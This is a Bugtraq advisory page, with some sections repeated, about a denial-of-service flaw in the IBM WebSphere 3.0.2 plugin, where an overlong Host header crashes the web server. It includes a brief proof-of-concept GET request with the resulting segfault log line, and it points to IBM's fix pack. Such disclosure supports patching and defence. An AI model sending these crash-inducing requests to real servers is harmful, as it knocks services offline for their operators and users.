WebSphere Application Server Plugin DoS Vulnerability
BID:1691
Info
WebSphere Application Server Plugin DoS Vulnerability
| Bugtraq ID: | 1691 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Sep 15 2000 12:00AM |
| Updated: | Sep 15 2000 12:00AM |
| Credit: | Reported to bugtraq on September 15, 2000 by Rude Yak <[email protected]>. |
| Vulnerable: |
IBM Websphere Application Server 3.0.2 |
| Not Vulnerable: | |
Discussion
WebSphere Application Server Plugin DoS Vulnerability
Large amounts of data (ie 1092+ characters) in the Host: request header may cause the web server process to fault on signal 11 (SIGSEGV) or signal 10 (SIGBUS).
Large amounts of data (ie 1092+ characters) in the Host: request header may cause the web server process to fault on signal 11 (SIGSEGV) or signal 10 (SIGBUS).
Exploit / POC
WebSphere Application Server Plugin DoS Vulnerability
GET /servletsnoop HTTP/1.0
Host: xxxxxxxxxxxxxxxxxxxxxxxx(1092+ characters)
resulted in the following IBMHTTPD log entry:
[Fri May 26 12:00:54 2000] [notice] child pid 11306 exit signal Segmentation
Fault (11)
GET /servletsnoop HTTP/1.0
Host: xxxxxxxxxxxxxxxxxxxxxxxx(1092+ characters)
resulted in the following IBMHTTPD log entry:
[Fri May 26 12:00:54 2000] [notice] child pid 11306 exit signal Segmentation
Fault (11)
Solution / Fix
WebSphere Application Server Plugin DoS Vulnerability
Solution:
This vulnerability has been fixed by IBM in WAS 3.0.2 fix pack 2, available at http://www-4.ibm.com/software/webservers/appserv/efix.html
IBM Websphere Application Server 3.0.2
Solution:
This vulnerability has been fixed by IBM in WAS 3.0.2 fix pack 2, available at http://www-4.ibm.com/software/webservers/appserv/efix.html
IBM Websphere Application Server 3.0.2
-
IBM WAS 3.0.2 fix pack 2
http://www-4.ibm.com/software/webservers/appserv/efix.html
References
WebSphere Application Server Plugin DoS Vulnerability
References:
References: